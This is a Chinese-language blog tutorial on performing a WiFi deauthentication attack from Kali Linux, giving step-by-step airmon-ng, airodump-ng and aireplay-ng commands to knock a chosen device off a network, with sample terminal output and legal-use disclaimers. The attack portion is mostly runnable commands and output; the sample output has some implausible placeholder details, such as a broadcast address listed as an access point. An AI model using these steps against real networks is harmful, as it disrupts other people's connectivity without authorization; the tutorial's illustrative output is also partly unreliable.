返回

使用Kali Linux进行WiFi Deauthentication攻击的学习

记录一些使用Kali Linux进行WiFi Deauthentication攻击的学习

目录

仅为技术科普,请勿用于非法用途

内容未隐讳任何个人、群体、公司。非文学作品,请勿用于阅读理解的练习

根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途

本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责

当我们连接到Wi-Fi网络时,我们通常会认为我们的连接是安全的。但是,有些人可能会利用Wi-Fi协议中的漏洞进行攻击,使得我们的设备无法继续与网络通信。这就是WiFi Deauthentication攻击的基本原理。

在本文中,我要介绍如何使用Kali Linux执行WiFi Deauthentication攻击。

.-.             ____
         /   \          /      \
        /     \        |  0  0 |
       /   O   \       |   --   |
      /_________\      \______/
     /           \
    /             \
   /               \
  /                 \
 /                   \
/_____________________\
|                     |
|     kali-linux-     |
| wifi-deauth-attack- |
|        guide        |
|_____________________|
    |  |       |  |
    |__|       |__|

# 准备工作

在开始之前,您需要准备以下工具:

  • 一台安装了Kali Linux的计算机。
  • 一个支持监视模式的无线网卡(可用外置网卡)。

# 步骤

以下是执行WiFi Deauthentication攻击的基本步骤:

  1. 打开终端并启用监视模式。您可以使用以下命令:

    1
    
    sudo airmon-ng start wlan0
    
  2. 扫描可用的WiFi网络。您可以使用以下命令:

    1
    
    sudo airodump-ng wlan0mon
    

    这将显示周围的所有WiFi网络的详细信息,包括SSID、BSSID和信号强度等信息。

  3. 找到您要攻击的WiFi网络的BSSID和信道。您可以在airodump-ng的输出中找到这些信息。

  4. 执行Deauthentication攻击。您可以使用以下命令:

    1
    
    sudo aireplay-ng --deauth <数量> -a <BSSID> -c <目标设备的MAC地址> wlan0mon
    

    在上面的命令中,<数量>表示要发送的Deauthentication帧的数量,<BSSID>表示要攻击的WiFi网络的BSSID,<目标设备的MAC地址>表示要攻击的设备的MAC地址。wlan0mon是启用了监视模式的接口名称。

    您可以使用aireplay-ng的其他选项来更改攻击的参数,例如更改攻击间隔时间或使用不同的攻击模式等。

输出的结果

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
user@kali:~$ sudo airmon-ng start wlan0

[sudo] password for user: 
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  789 NetworkManager
  890 wpa_supplicant
  901 dhclient
 1234 avahi-daemon
 1235 avahi-daemon

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

user@kali:~$ sudo airodump-ng wlan0mon

 CH  6 ][ Elapsed: 1 min ][ 2023-08-03 14:00 ][ fixed channel wlan0mon: -1                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -40 100      600      100    2   6  54e. WPA2 CCMP   PSK  Wifi-1         
 AA:BB:CC:DD:EE:FF  -50   0      500        0    0   6  54e. WPA2 CCMP   PSK  Wifi-2         
 FF:FF:FF:FF:FF:FF   -60   0      400        0    0   6  54e. WPA2 CCMP   PSK  Wifi-3         

 BSSID              STATION            PWR   Rate    Lost    Frames Probe

 (not associated)   AA:BB:CC:DD:EE:FF   -1    -1 - -1      -        -1     
 (not associated)   BB:CC:DD:EE:FF:AA   -1    -1 - -1      -        -1     
 (not associated)   CC:DD:EE:FF:AA:BB   -1    -1 - -1      -        -1     

user@kali:~$ sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

14:01:23  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
14:01:23  Sending 10 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [ 0|10 ACKs]
14:01:23  Sending 10 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [10|10 ACKs]

# 注意事项

在执行WiFi Deauthentication攻击时,请注意以下几点:

  • 请确保您拥有合法的授权,并且只在法律允许的情况下使用此技术。
  • 请勿将此技术用于未经授权的网络。
  • 请勿将此技术用于任何非法用途。

# 结论

WiFi Deauthentication攻击是一种利用WiFi协议漏洞的攻击方式,可以使得连接到特定WiFi网络的设备无法继续与该网络通信。在Kali Linux中,您可以使用aireplay-ngairmon-ng这两个工具来执行此类攻击。但请注意,这种攻击可能会导致法律问题,因此请确保您拥有合法的授权,并且只在法律允许的情况下使用此技术。

# 视频效果演示

想看具体教程可以到我的Youtube频道看(B站审核严)

转载需要保留原始链接,未经明确许可,禁止商业使用。CC BY-NC-SA 4.0

最后更新于 2024-12-04 00:13 UTC